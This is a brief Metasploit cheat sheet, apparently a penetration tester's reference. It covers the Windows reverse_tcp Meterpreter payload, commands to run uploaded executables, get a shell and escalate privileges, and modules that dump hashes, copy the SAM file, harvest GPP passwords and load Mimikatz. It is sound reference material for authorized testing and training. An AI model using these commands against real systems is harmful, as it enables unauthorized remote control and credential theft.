Metasploit

Windows reverse meterpreter payload

set payload windows/meterpreter/reverse_tcp

Useful meterpreter commands.

Command

Description

upload file c:\\windows

Meterpreter upload file to Windows target

download c:\\windows\\repair\\sam /tmp

Meterpreter download file from Windows target

download c:\\windows\\repair\\sam /tmp

Meterpreter download file from Windows target

execute -f c:\\windows\temp\exploit.exe

Meterpreter run .exe on target - handy for executing uploaded exploits

execute -f cmd -c

Creates new channel with cmd shell

ps

Meterpreter show processes

shell

Meterpreter get shell on the target

getsystem

Meterpreter attempts priviledge escalation the target

hashdump

Meterpreter attempts to dump the hashes on the target

portfwd add –l 3389 –p 3389 –r target

Meterpreter create port forward to target machine

portfwd delete –l 3389 –p 3389 –r target

Meterpreter delete port forward

Post Exploit Windows Metasploit Modules

Windows Metasploit Modules for privilege escalation.

Command

Description

run post/windows/gather/win_privs

Metasploit show privileges of current user

use post/windows/gather/credentials/gpp

Metasploit grab GPP saved passwords

load mimikatz -> wdigest

Metasploit load Mimikatz

run post/windows/gather/local_admin_search_enum

Identify other machines that the supplied domain user has administrative access to

run post/windows/gather/smart_hashdump

dump credentials

Last updated